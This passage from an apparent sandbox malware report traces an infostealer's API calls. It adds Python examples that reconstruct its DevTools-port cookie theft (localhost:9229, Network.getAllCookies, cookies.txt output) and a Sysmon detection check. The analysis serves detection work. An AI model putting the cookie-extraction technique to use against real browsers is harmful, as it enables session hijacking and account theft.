                          • Opcode ID: ea50acda86223c671137fd0177f7c1c9e59eeed1fcac53513853bff799d4fc66
                          • Instruction ID: 5b455c72c55f9b63f4eaf0b40c7b1b9434b9baae830321f421da7b0906c5c903
                          • Opcode Fuzzy Hash: ea50acda86223c671137fd0177f7c1c9e59eeed1fcac53513853bff799d4fc66
                          • Instruction Fuzzy Hash: 3BB19375A1121A9BDB21EF78E8899DF7FB6BF85700F044428F846A7251DB34EC858F90
                          APIs
                            • Part of subcall function 005190C0: InternetOpenA.WININET(0053CFEC,00000001,00000000,00000000,00000000), ref: 005190DF
                            • Part of subcall function 005190C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 005190FC
                            • Part of subcall function 005190C0: InternetCloseHandle.WININET(00000000), ref: 00519109
                          • strlen.MSVCRT ref: 005192E1
                          • strlen.MSVCRT ref: 005192FA
                            • Part of subcall function 00518980: std::_Xinvalid_argument.LIBCPMT ref: 00518996
                          • strlen.MSVCRT ref: 00519399
                          • strlen.MSVCRT ref: 005193E6
                          • lstrcat.KERNEL32(?,cookies), ref: 00519547
                          • lstrcat.KERNEL32(?,00541794), ref: 00519559
                          • lstrcat.KERNEL32(?,?), ref: 0051956A
                          • lstrcat.KERNEL32(?,00544B98), ref: 0051957C
                          • lstrcat.KERNEL32(?,?), ref: 0051958D
                          • lstrcat.KERNEL32(?,.txt), ref: 0051959F
                          • lstrlen.KERNEL32(?), ref: 005195B6
                          • lstrlen.KERNEL32(?), ref: 005195DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 00519614
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                          • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                          • API String ID: 1201316467-3542011879
                          • Opcode ID: b815e2e499899a46c003ac2cf795ff948abab874d829733de01243f3a84cdc27
                          • Instruction ID: 19437b6ae5e09d305ac913bd87947dddf87a2d8b738ca2eb2f459cbdb79d9868
                          • Opcode Fuzzy Hash: b815e2e499899a46c003ac2cf795ff948abab874d829733de01243f3a84cdc27
                          • Instruction Fuzzy Hash: A1E14871E10219DFEF10DFA8D894ADEBBB5BF48300F1044A9E509A7281DB74AE85CF91
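The strings in this function (`http://localhost:9229/json`, `ws://localhost:9229`, `/devtools`, a `cookies...txt` output name) are the shape of a Chrome DevTools Protocol client: `/json` enumerates debuggable targets and returns the WebSocket URL to attach to, after which the browser hands over its cookies already decrypted, so the sample never has to deal with the on-disk cookie store. The exchange below is an added reconstruction, not code from the report or the sample. The discovery request and the endpoint come from the listed strings; the WebSocket method, `Network.getAllCookies`, is an assumption about what a cookie-stealing client sends, both replies are constructed rather than captured, and nothing here touches the network.

```python
"""The localhost:9229 exchange behind the function above, reconstructed as an
added example (not code from the report or the sample). The GET of
http://localhost:9229/json and the ws://localhost:9229/devtools/... endpoint
are taken from the strings the report lists; the DevTools method sent over the
WebSocket, Network.getAllCookies, is an assumption about what a cookie-stealing
client asks for, and both replies below are constructed rather than captured.
Only message parsing and formatting is shown, so nothing here touches the
network."""
import json
from typing import Optional

# Constructed reply to GET http://localhost:9229/json from a Chromium-family
# browser that was started with --remote-debugging-port=9229.
DISCOVERY_JSON = json.dumps([
    {"id": "SW1", "type": "service_worker", "url": "https://example.test/sw.js",
     "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/SW1"},
    {"id": "A1B2", "type": "page", "title": "New Tab", "url": "chrome://newtab/",
     "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/A1B2"},
])


def pick_target(discovery_body: str) -> Optional[str]:
    """Choose the WebSocket URL of the first page target; that is what the
    /json request exists to discover."""
    for target in json.loads(discovery_body):
        if target.get("type") == "page" and "webSocketDebuggerUrl" in target:
            return target["webSocketDebuggerUrl"]
    return None


def build_get_all_cookies(msg_id: int = 1) -> str:
    """CDP request (assumed method). The browser answers with every cookie in
    the profile already decrypted, which is the point of asking the browser
    instead of reading its cookie database from disk."""
    return json.dumps({"id": msg_id, "method": "Network.getAllCookies"})


# Constructed reply to the request above.
COOKIES_REPLY = json.dumps({"id": 1, "result": {"cookies": [
    {"name": "session", "value": "abc123", "domain": ".example.test", "path": "/",
     "expires": 1893456000, "httpOnly": True, "secure": True, "session": False},
    {"name": "prefs", "value": "dark", "domain": "example.test", "path": "/ui",
     "expires": -1, "httpOnly": False, "secure": False, "session": True},
]}})


def to_netscape(reply_body: str, msg_id: int = 1) -> str:
    """Render a Network.getAllCookies reply in the Netscape cookies.txt layout
    (domain, subdomain flag, path, secure flag, expiry, name, value): the kind
    of file the cookies<...>.txt name assembled above points at, and one curl
    and wget read back. curl's #HttpOnly_ prefix is kept for HttpOnly cookies."""
    reply = json.loads(reply_body)
    if reply.get("id") != msg_id or "result" not in reply:
        raise ValueError("unexpected reply: %s" % reply.get("error", reply))
    lines = ["# Netscape HTTP Cookie File"]
    for c in reply["result"]["cookies"]:
        domain = c["domain"]
        expires = 0 if c.get("session") or c.get("expires", -1) < 0 else int(c["expires"])
        fields = [
            ("#HttpOnly_" if c.get("httpOnly") else "") + domain,
            "TRUE" if domain.startswith(".") else "FALSE",
            c["path"],
            "TRUE" if c.get("secure") else "FALSE",
            str(expires),
            c["name"],
            c["value"],
        ]
        lines.append("\t".join(fields))
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(pick_target(DISCOVERY_JSON))
    print(build_get_all_cookies())
    print(to_netscape(COOKIES_REPLY), end="")
```

Nothing answers on 9229 unless a browser is listening there, which is why this technique is normally preceded by the stealer launching the browser itself with a `--remote-debugging-port` switch (not visible in this function's strings). On the defender's side that launch, and a non-browser process connecting to 127.0.0.1:9229, are the events to alert on; the cookie dump itself is plain localhost WebSocket traffic.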
                          APIs
                          • memset.MSVCRT ref: 0052D9A1
                          • memset.MSVCRT ref: 0052D9B3
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0052D9DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052DA0E
                          • lstrcat.KERNEL32(?,00000000), ref: 0052DA1C
                          • lstrcat.KERNEL32(?,011ADF18), ref: 0052DA36
                          • lstrcat.KERNEL32(?,?), ref: 0052DA4A
                          • lstrcat.KERNEL32(?,011ACFC8), ref: 0052DA5E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052DA8E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0052DA95
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052DAFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2367105040-0
                          • Opcode ID: 4c9a00387967acc14ab2920bf87579616b52271d697ffa98b66f17370db9970f
                          • Instruction ID: 87148b9d933589573bb039002df7294948b1bc479b8d7157e59e06ee93e83375
                          • Opcode Fuzzy Hash: 4c9a00387967acc14ab2920bf87579616b52271d697ffa98b66f17370db9970f
                          • Instruction Fuzzy Hash: A9B181B591022A9FDB10EFA4DC889EE7BB9BF89300F148565F905A7250DB349E84CF60
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051B330
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B37E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B3A9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051B3B1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B3D9
                          • lstrlen.KERNEL32(00544C50), ref: 0051B450
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B474
                          • lstrcat.KERNEL32(00000000,00544C50), ref: 0051B480
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B4A9
                          • lstrlen.KERNEL32(00000000), ref: 0051B52D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B557
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051B55F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B587
                          • lstrlen.KERNEL32(00544AD4), ref: 0051B5FE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B622
                          • lstrcat.KERNEL32(00000000,00544AD4), ref: 0051B62E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B65E
                          • lstrlen.KERNEL32(?), ref: 0051B767
                          • lstrlen.KERNEL32(?), ref: 0051B776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051B79E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: cbf9a1812a94f5d13000bbf45517fb6f291a33a9d2a4076f652eddd37a0a65da
                          • Instruction ID: b35cb26d3993d6c749cf8b951175c47ab5918e1656c605a8c56ff40c7c63e3cc
                          • Opcode Fuzzy Hash: cbf9a1812a94f5d13000bbf45517fb6f291a33a9d2a4076f652eddd37a0a65da
                          • Instruction Fuzzy Hash: 74025134A012068FFB25DF65D989AAABFB1BF45304F19C069E5099B261D775DCC2CF80
                          APIs
                            • Part of subcall function 005371E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005371FE
                          • RegOpenKeyExA.ADVAPI32(?,011AAF30,00000000,00020019,?), ref: 005337BD
                          • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 005337F7
                          • wsprintfA.USER32 ref: 00533822
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00533840
                          • RegCloseKey.ADVAPI32(?), ref: 0053384E
                          • RegCloseKey.ADVAPI32(?), ref: 00533858
                          • RegQueryValueExA.ADVAPI32(?,011ADA68,00000000,000F003F,?,?), ref: 005338A1
                          • lstrlen.KERNEL32(?), ref: 005338B6
                          • RegQueryValueExA.ADVAPI32(?,011ADB10,00000000,000F003F,?,00000400), ref: 00533927
                          • RegCloseKey.ADVAPI32(?), ref: 00533972
                          • RegCloseKey.ADVAPI32(?), ref: 00533989
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 13140697-3278919252
                          • Opcode ID: 381c3a9e88396509c163c5e2b4ea623b61688209444c477cf65b3a1c8d1b21b7
                          • Instruction ID: a5edb3bd02fedbb48ae9ba5676d1dc5d76385c1bbe2e1baab7109f911d94645d
                          • Opcode Fuzzy Hash: 381c3a9e88396509c163c5e2b4ea623b61688209444c477cf65b3a1c8d1b21b7
                          • Instruction Fuzzy Hash: FA915EB6D00209DFCB10DF94DD84AEEBBB9FB88314F14856AE509A7211D7359E45CF90
                          APIs
                          • InternetOpenA.WININET(0053CFEC,00000001,00000000,00000000,00000000), ref: 005190DF
                          • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 005190FC
                          • InternetCloseHandle.WININET(00000000), ref: 00519109
                          • InternetReadFile.WININET(?,?,?,00000000), ref: 00519166
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00519197
                          • InternetCloseHandle.WININET(00000000), ref: 005191A2
                          • InternetCloseHandle.WININET(00000000), ref: 005191A9
                          • strlen.MSVCRT ref: 005191BA
                          • strlen.MSVCRT ref: 005191ED
                          • strlen.MSVCRT ref: 0051922E
                          • strlen.MSVCRT ref: 0051924C
                            • Part of subcall function 00518980: std::_Xinvalid_argument.LIBCPMT ref: 00518996
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                          • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                          • API String ID: 1530259920-2144369209
                          • Opcode ID: 734ca699a1084289b3d55bda7c6aff558ae48fd1de82202298ec96a0e23d4122
                          • Instruction ID: 4738d881879159bd6a2b3b69964db6061ec9e421a80bfb36be4450c835ae0555
                          • Opcode Fuzzy Hash: 734ca699a1084289b3d55bda7c6aff558ae48fd1de82202298ec96a0e23d4122
                          • Instruction Fuzzy Hash: FD51C871640209ABEB20DBA4DC49BEEFFF9FF49710F14416AF504E3280DBB599848B65
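The function at 005190DF fetches http://localhost:9229/json over WinINet and then searches the body for the literals "webSocketDebuggerUrl": and "ws://. Port 9229 is the default of the Node.js inspector, and /json is the DevTools-protocol discovery endpoint that both the Node inspector and Chromium's remote debugging expose; each target listed there carries a webSocketDebuggerUrl pointing at the debugging socket. The example below is added by the editor and is not code from the report or from the sample: it reproduces that substring-scan extraction next to a proper JSON parse, and adds a detection pass over constructed Sysmon Event ID 3 style lines that flags processes connecting to the loopback debugging port. The JSON body, the log lines and the allowlist are all constructed for the example; the page does not show what the sample actually received.

```python
"""Added example (editor's code, not the sample's or Joe Sandbox's):
extraction of webSocketDebuggerUrl from a DevTools /json response, plus a
detection pass over Sysmon-style network events. Sample data is constructed."""
import json
import re

# Constructed /json body in the documented shape of a Node.js inspector or
# Chromium remote-debugging target list (an assumption about what the sample
# expected; the report only shows the URL and the two search strings).
SAMPLE_JSON_RESPONSE = """[ {
  "description": "",
  "id": "6c0f6a0e2d4b4c1f",
  "title": "example",
  "type": "page",
  "url": "https://example.test/",
  "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/6c0f6a0e2d4b4c1f"
}, {
  "description": "",
  "id": "node-main",
  "title": "node[1234]",
  "type": "node",
  "url": "file:///C:/app/main.js",
  "webSocketDebuggerUrl": "ws://localhost:9229/node-main"
} ]"""

KEY_MARKER = '"webSocketDebuggerUrl":'   # first literal from the report
WS_MARKER = '"ws://'                     # second literal from the report


def extract_ws_urls_by_scan(body: str) -> list:
    """Substring scan in the style the API list suggests (strlen-driven
    searching for the two literals, no JSON parser): for every key marker,
    take the '"ws://' that follows it and cut at the next double quote."""
    urls = []
    pos = 0
    while True:
        i = body.find(KEY_MARKER, pos)
        if i < 0:
            break
        j = body.find(WS_MARKER, i + len(KEY_MARKER))
        if j < 0:
            break
        k = body.find('"', j + 1)  # closing quote of the URL value
        if k < 0:
            break
        urls.append(body[j + 1:k])
        pos = k + 1
    return urls


def extract_ws_urls(body: str) -> list:
    """The same extraction done with a real JSON parse, for comparison."""
    return [t["webSocketDebuggerUrl"] for t in json.loads(body)
            if isinstance(t, dict) and "webSocketDebuggerUrl" in t]


# Constructed log lines in a Sysmon Event ID 3 (network connection) style.
# Field names follow Sysmon's schema; paths and addresses are made up here.
SAMPLE_EVENTS = [
    "EventID=3 Image=C:\\Users\\alice\\AppData\\Local\\Temp\\file.exe "
    "DestinationIp=127.0.0.1 DestinationPort=9229 Protocol=tcp",
    "EventID=3 Image=C:\\Program Files\\Microsoft VS Code\\Code.exe "
    "DestinationIp=127.0.0.1 DestinationPort=9229 Protocol=tcp",
    "EventID=3 Image=C:\\Windows\\System32\\svchost.exe "
    "DestinationIp=10.0.0.5 DestinationPort=443 Protocol=tcp",
    "EventID=1 Image=C:\\Windows\\System32\\cmd.exe CommandLine=cmd.exe /c whoami",
]

# key=value pairs whose values may contain spaces (e.g. "Program Files");
# a value runs until the next " Key=" token or the end of the line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_kv(line: str) -> dict:
    return {k: v for k, v in FIELD_RE.findall(line)}


def flag_devtools_loopback(events, port: str = "9229", allow_images=()) -> list:
    """Return the images that opened a connection to the loopback debugging
    port. Developer tooling legitimately does this, so known debugger clients
    (hypothetical allowlist) can be passed in allow_images by file name."""
    suffixes = tuple(a.lower() for a in allow_images)
    hits = []
    for line in events:
        ev = parse_kv(line)
        if ev.get("EventID") != "3":
            continue
        if ev.get("DestinationIp") not in ("127.0.0.1", "::1"):
            continue
        if ev.get("DestinationPort") != port:
            continue
        image = ev.get("Image", "")
        if suffixes and image.lower().endswith(suffixes):
            continue
        hits.append(image)
    return hits


if __name__ == "__main__":
    print(extract_ws_urls_by_scan(SAMPLE_JSON_RESPONSE))
    print(flag_devtools_loopback(SAMPLE_EVENTS, allow_images=("code.exe",)))
```

The scan and the parse agree on well-formed input; the scan is the cheaper routine a stealer written around lstrlen and string searches would use, and it is also what you would pattern-match on when hunting for the same capability in other samples. On the detection side, a loopback connection to 9229 is only interesting when the connecting image is not a debugger client you expect, so keep the allowlist short and tied to image paths rather than file names alone where your telemetry allows it.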
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 005316A1
                          • lstrcpy.KERNEL32(00000000,0119B018), ref: 005316CC
                          • lstrlen.KERNEL32(?), ref: 005316D9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005316F6
                          • lstrcat.KERNEL32(00000000,?), ref: 00531704
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0053172A
                          • lstrlen.KERNEL32(011A9CE8), ref: 0053173F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00531762
                          • lstrcat.KERNEL32(00000000,011A9CE8), ref: 0053176A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531792
                          • ShellExecuteEx.SHELL32(?), ref: 005317CD
                          • ExitProcess.KERNEL32 ref: 00531803
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                          • String ID: <
                          • API String ID: 3579039295-4251816714
                          • Opcode ID: 15338c704619d916de57bea729a2d69ad883662add1918e5606794be38c57aae
                          • Instruction ID: 1ee5edfd00401ae80bf72beed1994e0e259ac0f4b28d620a56ad45bd8b15475d
                          • Opcode Fuzzy Hash: 15338c704619d916de57bea729a2d69ad883662add1918e5606794be38c57aae
                          • Instruction Fuzzy Hash: 6851747490161A9BDB21DFB4CC84ADEBBF9FF89300F048126E505E3251DB74AE45CB98
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052EFE4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052F012
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0052F026
                          • lstrlen.KERNEL32(00000000), ref: 0052F035
                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 0052F053
                          • StrStrA.SHLWAPI(00000000,?), ref: 0052F081
                          • lstrlen.KERNEL32(?), ref: 0052F094
                          • lstrlen.KERNEL32(00000000), ref: 0052F0B2
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0052F0FF
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 0052F13F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$AllocLocal
                          • String ID: ERROR
                          • API String ID: 1803462166-2861137601
                          • Opcode ID: 08d8cbd85322320b166094ad831deb1a1a288a3de0376aa2ca502e1777d05cb8
                          • Instruction ID: 4ca113b5d1e58b0e9627613e68970e4971ba029831edc8d9290b4c17fa4e5d25
                          • Opcode Fuzzy Hash: 08d8cbd85322320b166094ad831deb1a1a288a3de0376aa2ca502e1777d05cb8
                          • Instruction Fuzzy Hash: E151AF319502569BDB21AF78EC4DAAE7FB5BF82700F044079F9069B252DB74DC91CB90
                          APIs
                          • GetEnvironmentVariableA.KERNEL32(011A89D0,00749BD8,0000FFFF), ref: 0051A026
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051A053
                          • lstrlen.KERNEL32(00749BD8), ref: 0051A060
                          • lstrcpy.KERNEL32(00000000,00749BD8), ref: 0051A08A
                          • lstrlen.KERNEL32(00544C4C), ref: 0051A095
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051A0B2
                          • lstrcat.KERNEL32(00000000,00544C4C), ref: 0051A0BE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051A0E4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051A0EF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051A114
                          • SetEnvironmentVariableA.KERNEL32(011A89D0,00000000), ref: 0051A12F
                          • LoadLibraryA.KERNEL32(011AD208), ref: 0051A143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                          • String ID:
                          • API String ID: 2929475105-0
                          • Opcode ID: 62254d54fbf37f3d562736d767139c4f69f7f0159d42120df508d8158d81cd1d
                          • Instruction ID: 496cc5e0236b350fddc78fc95d9d7b7ec1c17676ccb963b6acf83db3cf240084
                          • Opcode Fuzzy Hash: 62254d54fbf37f3d562736d767139c4f69f7f0159d42120df508d8158d81cd1d
                          • Instruction Fuzzy Hash: 3691C3386016159FF7329FB4DC48AEA3BA6FB95704F40851AE51587251EFB9CDC0CB82
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052C8A2
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052C8D1
                          • lstrlen.KERNEL32(00000000), ref: 0052C8FC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052C932
                          • StrCmpCA.SHLWAPI(00000000,00544C3C), ref: 0052C943
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 06fd6e5273aa62bdb5d385e572ab8c4b10f09344fcb0c19f245fa590cb4d7eb2
                          • Instruction ID: eb8054a65608014ab9f7e3937dd3da0d52765d34ea634e90993f1c1721c722f9
                          • Opcode Fuzzy Hash: 06fd6e5273aa62bdb5d385e572ab8c4b10f09344fcb0c19f245fa590cb4d7eb2
                          • Instruction Fuzzy Hash: E561D471D0022A9BDB20EFB4DC89AEE7FB9BF46740F044565E841E7282D7789D858B90
                          APIs
                          • memset.MSVCRT ref: 0053451A
                          • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00524F39), ref: 00534545
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0053454C
                          • wsprintfW.USER32 ref: 0053455B
                          • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 005345CA
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 005345D9
                          • CloseHandle.KERNEL32(00000000,?,?), ref: 005345E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                          • String ID: 9OR$%hs$9OR
                          • API String ID: 3729781310-3184690833
                          • Opcode ID: 1f6151b3bbb912a1bd4ce85896ca47694099dbc045aaa67eb3a752e75c36dd6d
                          • Instruction ID: c7326aa08cb10581263e137ded9aa4c1f2f4d2a4e35acda1a8b77ee1cb66bbfe
                          • Opcode Fuzzy Hash: 1f6151b3bbb912a1bd4ce85896ca47694099dbc045aaa67eb3a752e75c36dd6d
                          • Instruction Fuzzy Hash: D0317376A00209BBDB20DBE4DC49FDE7B78FF45700F104056FA05E7190EB746A458BAA
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00530CF0), ref: 00534276
                          • GetDesktopWindow.USER32 ref: 00534280
                          • GetWindowRect.USER32(00000000,?), ref: 0053428D
                          • SelectObject.GDI32(00000000,00000000), ref: 005342BF
                          • GetHGlobalFromStream.COMBASE(00530CF0,?), ref: 00534336
                          • GlobalLock.KERNEL32(?), ref: 00534340
                          • GlobalSize.KERNEL32(?), ref: 0053434D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                          • String ID:
                          • API String ID: 1264946473-0
                          • Opcode ID: 36393c5d9a70d5bc0ac995221b61d6ac44c09ba36d309b0ddfd8b30fce845be2
                          • Instruction ID: ab9bb3c0001609682297b0a7a77c07a78d5d8fe69f64fbebd96d266faeac2faa
                          • Opcode Fuzzy Hash: 36393c5d9a70d5bc0ac995221b61d6ac44c09ba36d309b0ddfd8b30fce845be2
                          • Instruction Fuzzy Hash: 2C511F75910209AFDB10DFA4DC89AEE7BB9FF89300F10451AFA05A3250DB74AD45CFA5
                          APIs
                          • lstrcat.KERNEL32(?,011ADF18), ref: 0052E00D
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0052E037
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0052E07D
                          • lstrcat.KERNEL32(?,?), ref: 0052E098
                          • lstrcat.KERNEL32(?,?), ref: 0052E0AC
                          • lstrcat.KERNEL32(?,0119B248), ref: 0052E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0052E0D4
                          • lstrcat.KERNEL32(?,011AD3E8), ref: 0052E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0052E126
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 4230089145-0
                          • Opcode ID: fc6e1d70a71aa919554ed70e1d01131a39fa3db0d93684cbecedeb0f3c99a7a6
                          • Instruction ID: 30e3c7513faac47e6c8b43a9196bca7a8ea4c911d9e89a2810ee110e03bafd92
                          • Opcode Fuzzy Hash: fc6e1d70a71aa919554ed70e1d01131a39fa3db0d93684cbecedeb0f3c99a7a6
                          • Instruction Fuzzy Hash: C261EF7591012CEBDB25DB64DC49ADEBBB5BF89300F1088A5E609A3290DB709FC5CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00516AFF
                          • InternetOpenA.WININET(0053CFEC,00000001,00000000,00000000,00000000), ref: 00516B2C
                          • StrCmpCA.SHLWAPI(?,011AE4E8), ref: 00516B4A
                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00516B6A
                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00516B88
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00516BA1
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00516BC6
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00516BF0
                          • CloseHandle.KERNEL32(00000000), ref: 00516C10
                          • InternetCloseHandle.WININET(00000000), ref: 00516C17
                          • InternetCloseHandle.WININET(?), ref: 00516C21
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                          • String ID:
                          • API String ID: 2500263513-0
                          • Opcode ID: 2e5417cb524a86c30feaad1561e76c980f32e23372cf2f78ec8bac2c02a23c31
                          • Instruction ID: 5375d04d0b5b3531f5937d412384fbf91921d0b5b9c7cfb2a4369a9fd42fcba6
                          • Opcode Fuzzy Hash: 2e5417cb524a86c30feaad1561e76c980f32e23372cf2f78ec8bac2c02a23c31
